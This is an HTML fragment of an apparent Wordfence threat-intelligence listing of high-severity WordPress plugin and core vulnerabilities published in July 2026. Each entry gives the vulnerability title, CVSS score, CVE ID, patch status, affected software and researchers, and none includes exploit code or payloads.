<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/241d7a82-5fa5-40e3-9336-823644ca17f0" target="_blank" rel="noopener">Loco Translate &lt;= 2.8.5 &#8211; Cross-Site Request Forgery to Remote Code Execution via &#8216;template&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15005" target="_blank" rel="noopener noreferrer">							CVE-2026-15005						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/loco-translate" target="_blank" rel="noopener">Loco Translate</a> <span class="wfvr-software-slug">[loco-translate]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michael-mazzolini" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7abadae46f0b063bdd43911a30a87f65.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7abadae46f0b063bdd43911a30a87f65"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michael-mazzolini" target="_blank" rel="noopener">mikemyers</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/241d7a82-5fa5-40e3-9336-823644ca17f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9bb520df-e838-4335-bd4f-97026082a204" target="_blank" rel="noopener">Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content &lt;= 4.16.18 &#8211; Authenticated (Author+) Limited Unsafe File Upload via upload_mimes Filter Expansion</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13352" target="_blank" rel="noopener noreferrer">							CVE-2026-13352						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar" target="_blank" rel="noopener">Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content – ProfilePress</a> <span class="wfvr-software-slug">[wp-user-avatar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/26a32c073d7e4edde36367c0e7b51808.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26a32c073d7e4edde36367c0e7b51808"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener">skyv3il</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8d0b3f283d2748d1077325cb2522f7ff.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8d0b3f283d2748d1077325cb2522f7ff"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener">Chirita Catalin-Andrei (CC99IE) (CC99IE)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9bb520df-e838-4335-bd4f-97026082a204" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76ad6d21-f277-496f-aa6b-f9d5cb8a3801" target="_blank" rel="noopener">WPFunnels &lt;= 3.12.8 &#8211; Authenticated (Funnel Manager+) Privilege Escalation via &#8216;group_id&#8217; Path Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15103" target="_blank" rel="noopener noreferrer">							CVE-2026-15103						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpfunnels" target="_blank" rel="noopener">WPFunnels – Funnel Builder for WooCommerce with Checkout &amp; One Click Upsell</a> <span class="wfvr-software-slug">[wpfunnels]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76ad6d21-f277-496f-aa6b-f9d5cb8a3801" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f2774e8-8b55-4c25-93c3-e0806208b1f3" target="_blank" rel="noopener">Uncanny Automator &lt;= 7.3.1.4 &#8211; Unauthenticated PHP Object Injection to Arbitrary File Deletion via Forminator Submitted-Field Token</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15008" target="_blank" rel="noopener noreferrer">							CVE-2026-15008						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</a> <span class="wfvr-software-slug">[uncanny-automator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f2774e8-8b55-4c25-93c3-e0806208b1f3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4aa8342f-1f36-4eb5-8b69-ab90fd85e5cb" target="_blank" rel="noopener">Advance Product Search- Voice &amp; Ajax Search for WooCommerce &lt;= 1.4.4 &#8211; Unauthenticated SQL Injection via &#8216;s&#8217; and &#8216;match&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12753" target="_blank" rel="noopener noreferrer">							CVE-2026-12753						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/th-advance-product-search" target="_blank" rel="noopener">Advance Product Search- Voice &amp; Ajax Search for WooCommerce</a> <span class="wfvr-software-slug">[th-advance-product-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4aa8342f-1f36-4eb5-8b69-ab90fd85e5cb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c03c07f-8f41-47c2-bc95-d92a623f5f7c" target="_blank" rel="noopener">Gravity Forms &lt;= 2.10.4 &#8211; Unauthenticated Arbitrary File Read via &#8216;gform_uploaded_files&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12997" target="_blank" rel="noopener noreferrer">							CVE-2026-12997						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gravityforms" target="_blank" rel="noopener">Gravity Forms</a> <span class="wfvr-software-slug">[gravityforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c03c07f-8f41-47c2-bc95-d92a623f5f7c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee3bbf20-43fd-4977-b0ba-b81e7a3810d0" target="_blank" rel="noopener">LearnPress &lt;= 4.4.1 &#8211; Missing Authorization to Unauthenticated Sensitive Information Exposure via /lp/v1/users/check-answer and /start-quiz REST Endpoints</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13765" target="_blank" rel="noopener noreferrer">							CVE-2026-13765						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongmin-lee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4556263103f4d729acc9ea43c104c0d3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4556263103f4d729acc9ea43c104c0d3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongmin-lee" target="_blank" rel="noopener">이성민</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee3bbf20-43fd-4977-b0ba-b81e7a3810d0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e413fe96-ca6d-49b6-9fb8-59eb9a63e559" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly &lt;= 27.7 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61949" target="_blank" rel="noopener noreferrer">							CVE-2026-61949						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly</a> <span class="wfvr-software-slug">[bookly-responsive-appointment-booking-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e413fe96-ca6d-49b6-9fb8-59eb9a63e559" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cbb4b5-cf6e-4cd1-ba36-0fe746b68514" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely &lt;= 6.2.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61948" target="_blank" rel="noopener noreferrer">							CVE-2026-61948						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1ff6f83f830b125bfe22fa490eb2bfe7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ff6f83f830b125bfe22fa490eb2bfe7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener">HieuPenguinnn</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cbb4b5-cf6e-4cd1-ba36-0fe746b68514" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4192f1eb-e52a-4b79-8795-ef79c687e9ae" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System &lt;= 1.2.3 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61950" target="_blank" rel="noopener noreferrer">							CVE-2026-61950						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4192f1eb-e52a-4b79-8795-ef79c687e9ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd087d06-5395-4dfd-a288-2c3271a62842" target="_blank" rel="noopener">WordPress Core 6.8 &#8211;  7.0.1 &#8211; Unauthenticated SQL Injection via author__not_in Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-60137" target="_blank" rel="noopener noreferrer">							CVE-2026-60137						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4418c9327e7455cc20ecc3238895e0d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4418c9327e7455cc20ecc3238895e0d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener">Trong Pham (dtro)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haongo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haongo" target="_blank" rel="noopener">haongo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd087d06-5395-4dfd-a288-2c3271a62842" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64f07bca-5d04-4b28-b775-f47ed692575e" target="_blank" rel="noopener">Breakdance &lt;= 2.7.1 &#8211; Unauthenticated Stored Cross-Site Scripting via Webhook Action Details</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7543" target="_blank" rel="noopener noreferrer">							CVE-2026-7543						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breakdance" target="_blank" rel="noopener">Breakdance</a> <span class="wfvr-software-slug">[breakdance]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64f07bca-5d04-4b28-b775-f47ed692575e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5242f5e4-a436-4e8b-87eb-f012d65712d9" target="_blank" rel="noopener">Download Monitor &#8211; WPForms Lock &lt;= 1.0.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57427" target="_blank" rel="noopener noreferrer">							CVE-2026-57427						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dlm-wpforms-lock" target="_blank" rel="noopener">Download Monitor &#8211; WPForms Lock</a> <span class="wfvr-software-slug">[dlm-wpforms-lock]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5242f5e4-a436-4e8b-87eb-f012d65712d9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4e61162-dba8-4cb8-b953-031b963de208" target="_blank" rel="noopener">Form Vibes – Save Contact Form 7 &amp; Elementor Form Entries to Database &lt;= 1.5.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
